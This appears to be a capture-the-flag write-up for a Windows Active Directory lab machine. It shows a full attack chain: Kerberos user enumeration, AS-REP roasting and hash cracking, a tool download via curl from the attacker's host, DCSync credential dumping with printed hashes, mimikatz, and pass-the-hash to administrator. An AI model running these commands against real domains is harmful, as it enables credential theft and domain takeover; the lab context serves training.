## Scanning & Enumeration ```shell Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 02:47 EDT Nmap scan report for 10.10.10.175 Host is up (0.15s latency). Not shown: 990 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Egotistical Bank :: Home 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-27 13:47:42Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 7h00m03s | smb2-time: | date: 2023-04-27T13:47:56 |_ start_date: N/A | smb2-security-mode: | 311: |_ Message signing enabled and required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 70.88 seconds ``` Domain : EGOTISTICAL-BANK.LOCAL we also have smb port open, as well as a web server running. ##### PORT 80  ##### PORT 445  ##### PORT 389/636 with the command : `ldapsearch -x -H ldap://10.10.10.175 -s base`  ##### PORT 88 using kerbrute, I first performed username enumeration with a wordlist from SecLists using the command: ```shell kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /path/to/SecLists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175 ```  Now we have hsmith, fsmith, where we also have a smith from the about page of the website. I create a list of usernames for each one found in the website: ```shell └─$ cat usernames.txt fsmith scoins hbear btaylor sdriver ``` ## Initial Foothold ##### AS-REP Roasting ```shell └─$ impacket-GetNPUsers 'EGOTISTICAL-BANK.LOCAL/' -usersfile usernames.txt -format hashcat -outputfile hashes -dc-ip 10.10.10.175 Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) ``` ```shell └─$ cat hashes $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:e94ecc252a526efeee56c20af22ac0d4$22183e886837f706421f088a9338a07bc940c2a605620d8f6aa77f3af95ee0eb9e5b744ec80c377eb09bfd9a56d51cc0e1007a6358ed4d10e6d5a32cd0318d9aa3d6ee1fbccaa46a7ed00a179abcde6fe96d0f0698a895854919251da4984942aa75dde5ee579cfa832a75a9bf123ea0970b6d1e13a1d0d51a84989e84339af38b91cc0d6c8a0459fd07735d8473d8cd4f2b63efd8ad8d3500397bf3be9dba0cce6523a8debadd7de00666bf24cf158a89da6e02f5bb1eaace47f4efc3e7a2499fd91b0582481b878f24a95d4ae6fa9c4ec2703ecbffd9095826f248930bbee68384dcc34a20fee4d155c6e4310d78d0aa2a6934e1306f46359e3699401cb1a6 ``` We have the hash for the user fsmith, we proceed to crack it with hashcat or john however you see fit , with the command: HASHCAT ```shell hashcat -m 18200 hashes /path/to/rockyou.txt --force ``` JOHN ```shell john --wordlist=/path/to/rockyou.txt hashes ``` The password is : **Thestrokes23** You can then connect with **evil-winrm** using the command: ```shell evil-winrm -i 10.10.10.175 -u "fsmith" -p "Thestrokes23" ``` The user flag can be found in `C:\Users\FSmith\Desktop\user.txt` ## Privilege Escalation I first upload **winPeas** which will allow me to understand and know my approach to privilege escalation. I will host a python web server in the directory where winpeas is at: ```shell python3 -m http.server ``` and from the target that we just logged in, I shall run: ```shell curl http://<myIP>:8000/winPEASany.exe -OutFile winpeas.exe ``` Then I shall execute the binary. While winpeas runs , there is some information that is provided where we can see that there is AutoLogon credentials available:  We now proceed to check for all users that are in the server:  We can see that the username is actually : **svc_loanmgr**. Now we login using evil-winrm. And we proceed further using bloodhound since it's all AD. I upload sharphound to the server, and run it. Then wait for the results.  i'll then import the ZIP file to blood hound for further analysis:  Checking for the user **SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL** as a node we will be able to see that the user has outbound object control as shown below:  He has **GetChanges**, **GetChangesAll**, and **DCSync** . Now checking for descriptive information about these privilege:  So with conjunction with the GetChangesAll privilege we can perform a DCSync attack. From the [article](https://pswalia2u.medium.com/active-directory-attack-paths-with-exploitation-will-be-updated-as-i-learn-more-b23b5cfdae10) there are alot of ways to do this attack. I'll do it with the secretsdump from impacket. I run secrets dump with the command: ```shell impacket-secretsdump 'svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175' ``` ```shell Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c::: EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c::: SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:2b7af355cec716eccceabd185054878a::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657 Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e Administrator:des-cbc-md5:fb8f321c64cea87f krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24 krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9 krbtgt:des-cbc-md5:c170d5dc3edfc1d9 EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324 EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9 EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7 EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2 EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2 SAUNA$:aes256-cts-hmac-sha1-96:7883b96590554850767bcd615e8477fbc7f21276730dc5dcd92d4b8e1745b333 SAUNA$:aes128-cts-hmac-sha1-96:db8fd7cd326d2d15c7abccf8bea8a0c8 SAUNA$:des-cbc-md5:104c515b86739e08 ``` Now I upload mimikatz to the server, and run it as follows: ```shell .\mimikatz.exe 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:aministrator' exit ```  I shall now use **wmiexec** from impacket to get shell as administrator : ```shell impacket-wmiexec -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 administrator@10.10.10.175 ```  And we have access as administrator :)